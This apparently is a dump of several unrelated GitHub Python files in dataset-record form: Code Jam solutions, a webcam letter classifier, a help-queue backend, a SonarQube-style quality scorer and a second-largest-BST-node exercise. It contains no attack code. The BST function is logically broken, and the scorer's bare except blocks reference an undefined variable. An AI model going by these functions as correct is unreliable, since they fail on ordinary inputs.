\n\n# start the flask app, allow remote connections \napp.run(host='0.0.0.0')","repo_name":"minhtien2152/e-kids-be","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23564993451","text":"fin = open('B-large.in','r')\nfout = open('output.txt','w')\nt = int(fin.readline())\nfor count in range(1, t + 1):\n line = fin.readline().strip()\n n = list(line)\n n = list(map(int, n));\n for i in range(1, len(n)):\n if n[i] < n[i - 1]:\n j = i - 1;\n while (j > 0) and (n[j] == n[j - 1]):\n j = j - 1;\n n[j] = n[j] - 1;\n for k in range(j + 1, len(n)):\n n[k] = 9;\n break;\n fout.write('Case #' + str(count) + ': ')\n if n[0] != 0:\n fout.write(str(n[0]))\n for i in range(1, len(n)):\n fout.write(str(n[i]))\n fout.write('\\n')\nfin.close()\nfout.close()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/652.py","file_name":"652.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23585698381","text":"from math import pi\ntt = int(input())\nfor case in range(1,tt+1):\n n,k = list(map(int, input().split()))\n ck = []\n for i in range(n):\n r, h = list(map(float, input().split()))\n ck.append((2*pi*r*h, pi * r**2))\n ck = sorted(ck, key=lambda w: -w[1])\n use = [0.0]*(k+1)\n for it in ck:\n for b in range(k-1,-1,-1):\n if b == 0:\n use[1] = max(use[1], sum(it))\n else:\n use[b+1] = max(use[b+1], use[b]+it[0])\n print(\"Case #%d: %f\"%(case, use[k]))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/278.py","file_name":"278.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5060884201","text":"import cv2\r\nimport torch\r\nfrom torchvision.transforms import transforms\r\nimport torchvision\r\nimport numpy\r\nfrom PIL import Image\r\n\r\n\r\ndef camuh():\r\n vid_cod = cv2.VideoWriter_fourcc(*'XVID')\r\n output = cv2.VideoWriter(\"cam_video.mp4\", vid_cod, 20.0, (640,480))\r\n videoCaptureObject = cv2.VideoCapture(0)\r\n pred_labels = []\r\n while(True):\r\n ret,frame = videoCaptureObject.read()\r\n\r\n cv2.imwrite('image.png',frame)\r\n cv2.imshow('recognising,press q to quit',frame)\r\n path=\"modeluh.pt\"\r\n device=torch.device('cpu')\r\n model = torchvision.models.vgg19_bn(pretrained=True)\r\n model=(torch.load(path, map_location=device))\r\n model.eval()\r\n transform = transforms.Compose([transforms.Resize(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor()])\r\n \r\n \r\n image =transform(Image.open('image.png'))\r\n #print(image)\r\n image = image.unsqueeze(0)\r\n outputs = model(image)\r\n _, predicted = torch.max(outputs.data,1 )\r\n a=(predicted.item())\r\n #print(a)\r\n #print(_)\r\n dictuh ={\r\n 0:'a',\r\n 1:'b',\r\n 2:'c',\r\n 3:'d',\r\n 4:'e',\r\n 5:'f',\r\n 6:'g',\r\n 7:'h',\r\n 8:'i',\r\n 9:'j',\r\n 10:'k',\r\n 11:'l',\r\n 12:'m',\r\n 13:'n',\r\n 14:'o',\r\n 15:'p',\r\n 16:'q',\r\n 17:'r',\r\n 18:'s',\r\n 19:'t',\r\n 20:'u',\r\n 21:'v',\r\n 22:'w',\r\n 23:'x',\r\n 24:'y',\r\n 25:'z',\r\n }\r\n\r\n vandru=dictuh[a]\r\n pred_labels.append(vandru)\r\n #print(pred_labels)\r\n output.write(frame)\r\n if(cv2.waitKey(1) & 0xFF == ord('q')):\r\n break\r\n output.release()\r\n videoCaptureObject.release()\r\n cv2.destroyAllWindows()\r\n return pred_labels\r\n\r\n'''\r\n\r\n\r\nimport cv2\r\n#Capture video from webcam\r\nvid_capture = cv2.VideoCapture(0)\r\nvid_cod = cv2.VideoWriter_fourcc(*'XVID')\r\noutput = cv2.VideoWriter(\"videos/cam_video.mp4\", vid_cod, 20.0, (640,480))\r\nwhile(True):\r\n # Capture each frame of webcam video\r\n ret,frame = vid_capture.read()\r\n cv2.imshow(\"My cam video\", frame)\r\n output.write(frame)\r\n # Close and break the loop after pressing \"x\" key\r\n if cv2.waitKey(1) &0XFF == ord('x'):\r\n break\r\n# close the already opened camera\r\nvid_capture.release()\r\n# close the already opened file\r\noutput.release()\r\n# close the window and de-allocate any associated memory usage\r\ncv2.destroyAllWindows()\r\n\r\n'''\r\n","repo_name":"srisharaan/chatease","sub_path":"cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19743130094","text":"'''\nbackened (core functions)\n'''\nWAITING_LIST = []\n\ndef make_request(student_id, issue):\n '''\n Used by students to make a request. The request is put in the queue with a\n \"waiting\" status.\n Parameters:\n student_id (str): The student_id of the student making the request.\n\n issue (str): A brief issue of what the student needs help\n with.\n '''\n global WAITING_LIST\n\n if issue is None:\n raise ValueError\n if issue == \"\":\n raise ValueError\n # correspondoing student student_id is already insstudent_ide the queue.\n for student in WAITING_LIST:\n if student['student_id'] == student_id:\n raise KeyError\n\n WAITING_LIST.append({'student_id': student_id, 'issue': issue, 'status': 'waiting'})\n\n\ndef queue():\n '''\n Used by tutors to view all the students in the queue in order.\n\n Returns:\n (list of dict) : A list of dictionaries where each dictionary has the keys\n { 'student_id', 'issue', 'status' }. These correspond to the student's student_id,\n the issue of their problem, and the status of their request (either\n \"waiting\" or \"receiving\").\n '''\n global WAITING_LIST\n return WAITING_LIST\n\ndef remaining(student_id):\n '''\n Used by students to see how many requests there are ahead of theirs in the\n queue that also have a \"waiting\" status.\n\n Params:\n student_id (str): The student_id of the student with the request.\n\n Raises:\n KeyError: if the student does not have a request in the queue with a\n \"waiting\" status.\n\n Returns:\n (int) : The position as a number >= 0\n '''\n for student in queue():\n if student['student_id'] == student_id and student['status'] == 'receiving':\n raise KeyError\n for student in queue():\n if student['student_id'] == student_id:\n get_turn = queue().index(student)\n if queue()[0]['status'] == 'receiving':\n return get_turn - 1\n return get_turn\n\ndef help(student_id):\n '''\n Used by tutors to indicate that a student is getting help with their\n request. It sets the status of the request to \"receiving\".\n\n Params:\n student_id (str): The student_id of the student with the request.\n\n Raises:\n KeyError: if the given student does not have a request with a \"waiting\"\n status.\n '''\n for student in queue():\n if student['student_id'] == student_id:\n if student['status'] != 'waiting':\n raise KeyError\n student['status'] = 'receiving'\n\ndef resolve(student_id):\n '''\n Used by tutors to remove a request from the queue when it has been resolved.\n\n Params:\n student_id (str): The student_id of the student with the request.\n\n Raises:\n KeyError: if the given student does not have a request in the queue with a\n \"receiving\" status.\n '''\n for student in queue():\n if student['student_id'] == student_id:\n if student['student_id'] == student_id and student['status'] != 'receiving':\n raise KeyError\n queue().remove(student)\n # update student_id_TIME_PAIR dictionary because they've got help\n\ndef cancel(student_id):\n '''\n Used by students to remove their request from the queue in the event they\n solved the problem themselves before a tutor was a available to help them.\n\n Unlike resolve(), any requests that are cancelled are NOT counted towards\n the total number of requests the student has made in the session.\n\n Params:\n student_id (str): The student_id of the student who made the request.\n\n Raises:\n KeyError: If the student does not have a request in the queue with a\n \"waiting\" status.\n '''\n for student in queue():\n if student['student_id'] == student_id:\n if student['status'] != 'waiting':\n raise KeyError\n queue().remove(student)\n\ndef revert(student_id):\n '''\n Used by tutors in the event they cannot continuing helping the student. This\n function sets the status of student's request back to \"waiting\" so that\n another tutor can help them.\n\n Params:\n student_id (str): The student_id of the student with the request.\n\n Raises:\n KeyError: If the student does not have a request in the queue with a\n \"receiving\" status.\n '''\n for student in queue():\n if student['student_id'] == student_id:\n if student['status'] != 'receiving':\n raise KeyError\n student['status'] = 'waiting'\n\ndef reset_queue():\n '''\n Reset\n Used by tutors at the end of the help session. All requests are removed from\n the queue and any records of previously resolved requests are wiped.\n '''\n global WAITING_LIST\n WAITING_LIST = []\n","repo_name":"haeSunshim/Issue-Tracker_Sandeep-Haesun","sub_path":"backend_queuing_app/queuing_app.py","file_name":"queuing_app.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13528544274","text":"import pandas as pd\nfrom sqlalchemy import create_engine\n\n''' \nSQL classes for creating and getting connections inserting the data into database is done in these classes.\nThis class also calculates largest deviation.\n'''\n\n\nclass SQLClass:\n # Read csv\n def __init__(self, csv_path):\n self.dataFrames = []\n try:\n self.csv_data = pd.read_csv(csv_path)\n except FileNotFoundError:\n print(\"Issue while reading file {}\".format(csv_path))\n raise\n\n def toSql(self, file_name, title):\n\n db_engine = create_engine('sqlite:///{}.db'.format(file_name), echo=False)\n\n # Using dbEngine and saving data\n csv_data = self.csv_data.copy()\n csv_data.columns = [name.capitalize() + title for name in csv_data.columns]\n csv_data.set_index(csv_data.columns[0], inplace=True)\n\n csv_data.to_sql(title, db_engine, if_exists=\"replace\", index=True, )\n\n\nclass ParentFunction:\n\n def __init__(self, ideal, name):\n self._name = name\n self.ideal = ideal\n\n\nclass IdealFunction(ParentFunction):\n def __init__(self, ideal, train, name):\n self.train_function = train\n super().__init__(ideal, name)\n\n # Calculate the largest deviation between train and ideal\n def calculate_largest_deviation(self):\n deviation = self.train_function - self.ideal\n return max(deviation.abs())\n","repo_name":"AravindhRamasamy/Python-Programming","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20598195078","text":"from __future__ import division\r\n\r\n\r\ndef capitalized_words_in_tweet(tweet):\r\n count = 0\r\n if len(tweet) != 0:\r\n for w in tweet.split():\r\n if w.isupper():\r\n if len(w) > 1:\r\n count = count + 1\r\n return count\r\n\r\n\r\ndef exclamation_count(tweet):\r\n tweet_words = tweet.split()\r\n count = 0\r\n for word in tweet_words:\r\n if word.count(\"!\") > 2:\r\n count += 1\r\n return count\r\n\r\n\r\ndef question_mark_count(tweet):\r\n tweet_words = tweet.split()\r\n count = 0\r\n for word in tweet_words:\r\n if word.count(\"?\") > 2:\r\n count += 1\r\n return count\r\n\r\n\r\ndef capital_count_in_a_word(tweet):\r\n count = 0\r\n if len(tweet) != 0:\r\n for c in tweet:\r\n if str(c).isupper():\r\n count = count + 1\r\n return count\r\n\r\n\r\ndef surround_by_signs(tweet):\r\n highlight = ['\"', \"'\", \"*\"]\r\n count = 0\r\n if len(tweet) != 0:\r\n for c in tweet:\r\n if c[0] == c[len(c) - 1] and c[0] in highlight:\r\n count = count + 1;\r\n return count\r\n\r\n\r\ndef writing_style_vector(tweet):\r\n cap_word = capitalized_words_in_tweet(tweet)\r\n exc_count = exclamation_count(tweet)\r\n que_count = question_mark_count(tweet)\r\n cap_count = capital_count_in_a_word(tweet)\r\n surr_count = surround_by_signs(tweet)\r\n return [cap_word, exc_count, que_count, cap_count, surr_count]\r\n","repo_name":"Subangani/TSAwithSSL","sub_path":"src/_writing_style_.py","file_name":"_writing_style_.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"4272332282","text":"####################################################################################################\r\n# Modelo de calidad (reglas de cálculo)\r\n# Se evaluan estas característicascde calidad:\r\n# - Violations (incumplimientos).- se multiplica el número de incumplomientos por un factor que depende de su severidad (blocker, critical, major, minor, info)\r\n# Notas:\r\n# + La nota se trunca a 2/5 del máximo posible si hay alguna violación Blocker o Critical\r\n# - Coverage.- cobertura tests unitarios. Cuanto más mejor\r\n# - Densidad de comentarios.- cuanto más mejor\r\n# - COmplexity.- cuanto menos mejor\r\n# - Duplications.- cuanto menos mejor\r\n# A cada característica se le da un peso en el fichero properties (weight), y la suma de los pesos debe ser la nota máxima MAX_RATE = 5\r\n \r\n#\r\n####################################################################################################\r\nimport sys\r\nimport json\r\nimport datetime\r\n\r\nMAX_SCORE = 5.0\r\nMIN_SCORE = 0.0\r\n\r\n\r\nclass QualityRateEvaluator:\r\n \r\n def evaluate(qualityCodeResults, myQualityModel):\r\n try:\r\n print (\"Evaluating Quality Code Metrics ...\")\r\n totalRate = QualityRateEvaluator.calculateViolationsRate(qualityCodeResults, myQualityModel)\r\n totalRate += QualityRateEvaluator.calculateDuplicationsRate(qualityCodeResults, myQualityModel)\r\n totalRate += QualityRateEvaluator.calculateCommentsRate(qualityCodeResults, myQualityModel)\r\n totalRate += QualityRateEvaluator.calculateCoverageRate(qualityCodeResults, myQualityModel)\r\n totalRate += QualityRateEvaluator.calculateComplexityRate(qualityCodeResults, myQualityModel)\r\n \r\n qualityCodeResults.score = totalRate\r\n except Exception as e:\r\n print (\"Error in QualityRateEvaluator.evaluate: \", e)\r\n raise ValueError \r\n except: # catch *all* exceptions\r\n print (\"QualityRateEvaluator.evaluate: \", e)\r\n e = sys.exc_info()[0]\r\n print (\"EXCEPTION:\", e)\r\n\r\n\r\n\r\n def calculateViolationsRate(qualityCodeResults, myQualityModel):\r\n try:\r\n aggregatedMetricsWeight = myQualityModel.violations_weight + myQualityModel.coverage_weight + myQualityModel.duplication_weight + myQualityModel.complexity_weight + myQualityModel.comments_weight \r\n violationsScore = MIN_SCORE\r\n print (\" Evaluating Violations...\")\r\n print (\" Evaluating Blocker Violations Metric. Num violations:\", qualityCodeResults.blocker_violations, \". Severity Factor: \", myQualityModel.severity_factors[4])\r\n blockerViolationsFactor = qualityCodeResults.blocker_violations * myQualityModel.severity_factors[4]\r\n print (\" Blocker Violations Metric:\", blockerViolationsFactor)\r\n\r\n print (\" Evaluating Critical Violations Metric. Num violations:\", qualityCodeResults.critical_violations, \". Severity Factor: \", myQualityModel.severity_factors[3])\r\n criticalViolationsFactor = qualityCodeResults.critical_violations * myQualityModel.severity_factors[3]\r\n print (\" Critical Violations Metric:\", criticalViolationsFactor)\r\n\r\n print (\" Evaluating Major Violations Metric. Num violations:\", qualityCodeResults.major_violations, \". Severity Factor: \", myQualityModel.severity_factors[2])\r\n majorViolationsFactor = qualityCodeResults.major_violations * myQualityModel.severity_factors[2]\r\n print (\" Major Violations Metric:\", majorViolationsFactor)\r\n\r\n print (\" Evaluating Minor Violations Metric. Num violations:\", qualityCodeResults.minor_violations, \". Severity Factor: \", myQualityModel.severity_factors[1])\r\n minorViolationsFactor = qualityCodeResults.minor_violations * myQualityModel.severity_factors[1]\r\n print (\" Minor Violations Metric:\", minorViolationsFactor)\r\n\r\n print (\" Evaluating Info Violations Metric. Num violations:\", qualityCodeResults.info_violations, \". Severity Factor: \", myQualityModel.severity_factors[0])\r\n infoViolationsFactor = qualityCodeResults.info_violations * myQualityModel.severity_factors[0]\r\n print (\" Info Violations Metric:\", infoViolationsFactor)\r\n\r\n totalViolationsFactor = blockerViolationsFactor + criticalViolationsFactor + majorViolationsFactor + minorViolationsFactor + infoViolationsFactor\r\n print (\" Total Violations Metric:\", totalViolationsFactor)\r\n \r\n print (\" NCLOC:\", qualityCodeResults.ncloc, \". Violations Metric:\", totalViolationsFactor)\r\n violationsRate = qualityCodeResults.ncloc / totalViolationsFactor\r\n print (\" Violations Rate [NCLOC / totalViolationsMetric] (higher is better):\", violationsRate)\r\n \r\n if violationsRate > myQualityModel.max_violations_rate:\r\n violationsScore = MAX_SCORE\r\n print (\" Violations Rate is higher than MAX value (very good!). Set violationsScore to:\", violationsScore)\r\n elif violationsRate < myQualityModel.min_violations_rate:\r\n violationsScore = MIN_SCORE\r\n print (\" Violations Rate is lower than MIN value (very bad!). Set violationsScore to:\", violationsScore)\r\n else:\r\n # Calculate 3 rule\r\n violationsScore = (MAX_SCORE * (violationsRate - myQualityModel.min_violations_rate)) / (myQualityModel.max_violations_rate - myQualityModel.min_violations_rate) \r\n print ( \" Violations [ \", MIN_SCORE, \" - \", MAX_SCORE, \" ] Score:\", violationsScore)\r\n \r\n # If there are blocker or critical violations, absolute score is truncated to 2 point over 5\r\n truncatedScore = 2 * (MAX_SCORE / 5) \r\n if ((violationsScore > truncatedScore) and (qualityCodeResults.blocker_violations + qualityCodeResults.critical_violations > 0)):\r\n violationsScore = truncatedScore\r\n print (\" Violations Score truncated due to blocker / critical violations:\", violationsScore)\r\n\r\n\r\n violationsWeightedScore = (violationsScore * myQualityModel.violations_weight) / aggregatedMetricsWeight\r\n \r\n # If Score is higher than MAX, apply a BONUS\r\n if violationsScore >= MAX_SCORE:\r\n violationsWeightedScore += myQualityModel.violations_bonus;\r\n print (\" Reached Max Violations Metric Score --> BONUS [+\", myQualityModel.violations_bonus, \"] applied.\") \r\n # If Score is lower than MAX, apply a PENALTY\r\n if violationsScore <= MIN_SCORE:\r\n violationsWeightedScore -= myQualityModel.violations_penalty;\r\n print (\" Violations score is too low --> PENALTY [-\", myQualityModel.violations_penalty, \"] applied.\") \r\n\r\n print (\" Violations Metric Weight is \", myQualityModel.violations_weight , \" and violations Score is \", violationsScore)\r\n print (\" Final Violations Rated score (Weighted) is: \", violationsWeightedScore)\r\n print (\" \")\r\n return violationsWeightedScore \r\n except Exception as e:\r\n print (\"Error in QualityRateEvaluator.calculateViolationsRate: \", e)\r\n raise ValueError \r\n except: # catch *all* exceptions\r\n print (\"QualityRateEvaluator.calculateViolationsRate: \", e)\r\n e = sys.exc_info()[0]\r\n print (\"EXCEPTION:\", e)\r\n\r\n def calculateCommentsRate(qualityCodeResults, myQualityModel):\r\n try:\r\n aggregatedMetricsWeight = myQualityModel.violations_weight + myQualityModel.coverage_weight + myQualityModel.duplication_weight + myQualityModel.complexity_weight + myQualityModel.comments_weight \r\n score = MIN_SCORE\r\n weightedScore = MIN_SCORE\r\n print (\" Evaluating Comments density rate...\")\r\n print (\" Comments density percent (SonarMetric): \", qualityCodeResults.comment_lines_density)\r\n \r\n if qualityCodeResults.comment_lines_density < myQualityModel.comments_levels[0]:\r\n score = MIN_SCORE\r\n print (\" Metric is lower than Score Level 1 (very bad!). Set Score to:\", MIN_SCORE)\r\n elif qualityCodeResults.comment_lines_density > myQualityModel.comments_levels[4]:\r\n score = MAX_SCORE\r\n print (\" Metric is higher than Score Level 5 (very good!). Set Score to:\", MAX_SCORE)\r\n else:\r\n level = 1\r\n while ((level < 5) & (qualityCodeResults.comment_lines_density > myQualityModel.comments_levels[level])):\r\n level += 1\r\n # Reached Score is 1 point for each level reched plus a percentage of the current level (3-rule)\r\n partialScore = (qualityCodeResults.comment_lines_density - myQualityModel.comments_levels[level-1]) / (myQualityModel.comments_levels[level] - myQualityModel.comments_levels[level-1])\r\n score = level - 1 + partialScore \r\n print (\" Value is between Score Level \", level-1, \" (\", myQualityModel.comments_levels[level-1], \") and \", level, \" (\", myQualityModel.comments_levels[level], \"). Set Score to:\", score)\r\n \r\n weightedScore = (score * myQualityModel.comments_weight) / aggregatedMetricsWeight\r\n \r\n # If Score is higher than MAX, apply a BONUS\r\n if qualityCodeResults.comment_lines_density > myQualityModel.comments_max_value:\r\n weightedScore += myQualityModel.comments_bonus;\r\n print (\" Score is higher than MAX --> BONUS [+\", myQualityModel.comments_bonus, \"] applied.\") \r\n # If Score is lower than MIN, apply a PENALTY\r\n if qualityCodeResults.comment_lines_density < myQualityModel.comments_min_value:\r\n weightedScore -= myQualityModel.comments_penalty;\r\n print (\" Score is too low --> PENALTY [-\", myQualityModel.comments_penalty, \"] applied.\") \r\n\r\n print (\" Comments Density Metric Weight is \", myQualityModel.comments_weight , \" and Score is \", score)\r\n print (\" Final Comments Density Rated score (Weighted) is: \", weightedScore)\r\n print (\" \") \r\n return weightedScore\r\n \r\n except Exception as e:\r\n print (\"Error in QualityRateEvaluator.calculateCommentsRate: \", e)\r\n raise ValueError \r\n except: # catch *all* exceptions\r\n print (\"QualityRateEvaluator.calculateCommentsRate: \", e)\r\n e = sys.exc_info()[0]\r\n print (\"EXCEPTION:\", e)\r\n\r\n\r\n def calculateCoverageRate(qualityCodeResults, myQualityModel):\r\n try:\r\n aggregatedMetricsWeight = myQualityModel.violations_weight + myQualityModel.coverage_weight + myQualityModel.duplication_weight + myQualityModel.complexity_weight + myQualityModel.comments_weight \r\n score = MIN_SCORE\r\n weightedScore = MIN_SCORE\r\n print (\" Evaluating Test Coverage rate...\")\r\n print (\" Test Coverage percent (SonarMetric): \", qualityCodeResults.coverage)\r\n \r\n if qualityCodeResults.coverage < myQualityModel.coverage_levels[0]:\r\n score = MIN_SCORE\r\n print (\" Metric is lower than Score Level 1 (very bad!). Set Score to:\", MIN_SCORE)\r\n elif qualityCodeResults.coverage > myQualityModel.coverage_levels[4]:\r\n score = MAX_SCORE\r\n print (\" Metric is higher than Score Level 5 (very good!). Set Score to:\", MAX_SCORE)\r\n else:\r\n level = 1\r\n while ((level < 5) & (qualityCodeResults.coverage > myQualityModel.coverage_levels[level])):\r\n level += 1\r\n # Reached Score is 1 point for each level reched plus a percentage of the current level (3-rule)\r\n partialScore = (qualityCodeResults.coverage - myQualityModel.coverage_levels[level-1]) / (myQualityModel.coverage_levels[level] - myQualityModel.coverage_levels[level-1])\r\n score = level - 1 + partialScore \r\n print (\" Value is between Score Level \", level-1, \" (\", myQualityModel.coverage_levels[level-1], \") and \", level, \" (\", myQualityModel.coverage_levels[level], \"). Set Score to:\", score)\r\n \r\n weightedScore = (score * myQualityModel.coverage_weight) / aggregatedMetricsWeight\r\n \r\n # If Score is higher than MAX, apply a BONUS\r\n if qualityCodeResults.coverage > myQualityModel.coverage_max_value:\r\n weightedScore += myQualityModel.coverage_bonus;\r\n print (\" Score is higher than MAX --> BONUS [+\", myQualityModel.coverage_bonus, \"] applied.\") \r\n # If Score is lower than MIN, apply a PENALTY\r\n if qualityCodeResults.coverage < myQualityModel.coverage_min_value:\r\n weightedScore -= myQualityModel.coverage_penalty;\r\n print (\" Score is too low --> PENALTY [-\", myQualityModel.coverage_penalty, \"] applied.\") \r\n\r\n print (\" Test Coverage Metric Weight is \", myQualityModel.coverage_weight , \" and Score is \", score)\r\n print (\" Final Test Coverage Rated score (Weighted) is: \", weightedScore)\r\n print (\" \") \r\n return weightedScore\r\n \r\n except Exception as e:\r\n print (\"Error in QualityRateEvaluator.calculateCoverageRate: \", e)\r\n raise ValueError \r\n except: # catch *all* exceptions\r\n print (\"QualityRateEvaluator.calculateCoverageRate: \", e)\r\n e = sys.exc_info()[0]\r\n print (\"EXCEPTION:\", e)\r\n\r\n\r\n\r\n def calculateDuplicationsRate(qualityCodeResults, myQualityModel):\r\n try:\r\n aggregatedMetricsWeight = myQualityModel.violations_weight + myQualityModel.coverage_weight + myQualityModel.duplication_weight + myQualityModel.complexity_weight + myQualityModel.comments_weight \r\n duplicationScore = MIN_SCORE\r\n duplicationWeightedScore = MIN_SCORE\r\n print (\" Evaluating Duplicated Code rate...\")\r\n print (\" Duplications metric (SonarMetric): \", qualityCodeResults.duplicated_lines_density)\r\n \r\n # This is a NEGATIVE METRIC: HIHGER IS WORSE\r\n if qualityCodeResults.duplicated_lines_density > myQualityModel.duplication_levels[0]:\r\n score = MIN_SCORE\r\n print (\" Metric is higher than Score Level 1 (very bad!). Set Score to:\", MIN_SCORE)\r\n elif qualityCodeResults.duplicated_lines_density < myQualityModel.duplication_levels[4]:\r\n score = MAX_SCORE\r\n print (\" Metric is lower than Score Level 5 (very good!). Set Score to:\", MAX_SCORE)\r\n else:\r\n level = 1\r\n while ((level < 5) & (qualityCodeResults.duplicated_lines_density < myQualityModel.duplication_levels[level])):\r\n level += 1\r\n # Reached Score is 1 point for each level reched plus a percentage of the current level (3-rule)\r\n partialScore = (myQualityModel.duplication_levels[level-1] - qualityCodeResults.duplicated_lines_density) / (myQualityModel.duplication_levels[level-1] - myQualityModel.duplication_levels[level])\r\n score = level - 1 + partialScore \r\n print (\" Value is between Score Level \", level-1, \" (\", myQualityModel.duplication_levels[level-1], \") and \", level, \" (\", myQualityModel.duplication_levels[level], \"). Set Score to:\", score)\r\n \r\n weightedScore = (score * myQualityModel.duplication_weight) / aggregatedMetricsWeight\r\n \r\n # If Score is higher than MAX, apply a BONUS\r\n if qualityCodeResults.duplicated_lines_density < myQualityModel.duplication_min_value:\r\n weightedScore += myQualityModel.duplication_bonus;\r\n print (\" Score is higher than MAX --> BONUS [+\", myQualityModel.duplication_bonus, \"] applied.\") \r\n # If Score is lower than MIN, apply a PENALTY\r\n if qualityCodeResults.duplicated_lines_density > myQualityModel.duplication_max_value:\r\n weightedScore -= myQualityModel.duplication_penalty;\r\n print (\" Score is too low --> PENALTY [-\", myQualityModel.duplication_penalty, \"] applied.\") \r\n\r\n print (\" Duplicated Code Metric Weight is \", myQualityModel.duplication_weight , \" and Score is \", score)\r\n print (\" Final Duplicated Code Rated score (Weighted) is: \", weightedScore)\r\n print (\" \") \r\n return weightedScore\r\n \r\n except Exception as e:\r\n print (\"Error in QualityRateEvaluator.calculateDuplicationsRate: \", e)\r\n raise ValueError \r\n except: # catch *all* exceptions\r\n print (\"QualityRateEvaluator.calculateDuplicationsRate: \", e)\r\n e = sys.exc_info()[0]\r\n print (\"EXCEPTION:\", e)\r\n\r\n\r\n\r\n\r\n def calculateComplexityRate(qualityCodeResults, myQualityModel):\r\n try:\r\n aggregatedMetricsWeight = myQualityModel.violations_weight + myQualityModel.coverage_weight + myQualityModel.duplication_weight + myQualityModel.complexity_weight + myQualityModel.comments_weight \r\n complexityScore = MIN_SCORE\r\n complexityWeightedScore = MIN_SCORE\r\n print (\" Evaluating Complexity Code rate...\")\r\n print (\" Complexity in functions metric (SonarMetric): \", qualityCodeResults.complexity_in_functions)\r\n print (\" Number of functions (SonarMetric): \", qualityCodeResults.functions)\r\n averageComplexity = qualityCodeResults.complexity_in_functions / qualityCodeResults.functions\r\n print (\" Average complexity per function: \", averageComplexity)\r\n \r\n \r\n # This is a NEGATIVE METRIC: HIHGER IS WORSE\r\n if averageComplexity > myQualityModel.complexity_levels[0]:\r\n score = MIN_SCORE\r\n print (\" Metric is higher than Score Level 1 (very bad!). Set Score to:\", MIN_SCORE)\r\n elif averageComplexity < myQualityModel.complexity_levels[4]:\r\n score = MAX_SCORE\r\n print (\" Metric is lower than Score Level 5 (very good!). Set Score to:\", MAX_SCORE)\r\n else:\r\n level = 1\r\n while ((level < 5) & (averageComplexity < myQualityModel.complexity_levels[level])):\r\n level += 1\r\n # Reached Score is 1 point for each level reched plus a percentage of the current level (3-rule)\r\n partialScore = (myQualityModel.complexity_levels[level-1] - averageComplexity) / (myQualityModel.complexity_levels[level-1] - myQualityModel.complexity_levels[level])\r\n score = level - 1 + partialScore \r\n print (\" Value is between Score Level \", level-1, \" (\", myQualityModel.complexity_levels[level-1], \") and \", level, \" (\", myQualityModel.complexity_levels[level], \"). Set Score to:\", score)\r\n \r\n weightedScore = (score * myQualityModel.complexity_weight) / aggregatedMetricsWeight\r\n \r\n # If Score is higher than MAX, apply a BONUS\r\n if averageComplexity < myQualityModel.complexity_min_value:\r\n weightedScore += myQualityModel.complexity_bonus;\r\n print (\" Score is higher than MAX --> BONUS [+\", myQualityModel.complexity_bonus, \"] applied.\") \r\n # If Score is lower than MIN, apply a PENALTY\r\n if averageComplexity > myQualityModel.complexity_max_value:\r\n weightedScore -= myQualityModel.complexity_penalty;\r\n print (\" Score is too low --> PENALTY [-\", myQualityModel.complexity_penalty, \"] applied.\") \r\n\r\n print (\" Complexity Code Metric Weight is \", myQualityModel.complexity_weight , \" and Score is \", score)\r\n print (\" Final Complexity Rated score (Weighted) is: \", weightedScore)\r\n print (\" \") \r\n return weightedScore\r\n except Exception as e:\r\n print (\"Error in QualityRateEvaluator.calculateComplexityRate: \", e)\r\n raise ValueError \r\n except: # catch *all* exceptions\r\n print (\"QualityRateEvaluator.calculateComplexityRate: \", e)\r\n e = sys.exc_info()[0]\r\n print (\"EXCEPTION:\", e)\r\n\r\n\r\n ","repo_name":"overflow15/sonarqube-influxdb","sub_path":"python/qualityRateEvaluator.py","file_name":"qualityRateEvaluator.py","file_ext":"py","file_size_in_byte":20729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40143710936","text":"\"\"\"\nThis problem was asked by Dropbox.\nGiven the root to a binary search tree, find the second largest node in the tree.\n\n=========================== \n\n 10 root\n / \\ \n 7 18\n / \\ / \\ \n 6 9 16 19 * second largest\n / \\ \n3 20 largest node\n\nOutput: 19\n=============================\n\n 10 root and largest node\n / \n 7 \n / \\ \n 6 9 * second largest \n / \n3\n\nOutput: 9\n\"\"\"\n\nclass TreeNode:\n\n def __init__(self, value: int) -> None:\n self.value = value\n self.left = None\n self.right = None\n\n def __str__(self) -> str:\n return f\"{self.value}\"\n\n\ndef find_second_largest(node: TreeNode ) -> int:\n # Depth-first traversal approach.\n stack, second_largest = [], 0\n\n stack.append(node)\n\n while len(stack) > 0:\n current = stack.pop()\n\n if not current.right:\n while current:\n if current.left or current.right:\n second_largest = current.right.value\n current = current.right\n else:\n second_largest = current.left.value\n current = current.left\n else: \n second_largest = current.value\n stack.append(current.right)\n\n return second_largest\n\n# Bst root\nnode = TreeNode(10)\n\n# Left subtree\nnode.left = TreeNode(7)\nnode.left.right = TreeNode(9) # Second largest in Bst if no right subtree exist.\nnode.left.left = TreeNode(6)\nnode.left.left.left = TreeNode(3)\n\n# Right subtree\nnode.right = TreeNode(18)\nnode.right.left = TreeNode(16)\nnode.right.right = TreeNode(19) # Second largest in Bst if right subtree exist.\nnode.right.right.right = TreeNode(20)\n\nprint(find_second_largest(node)) 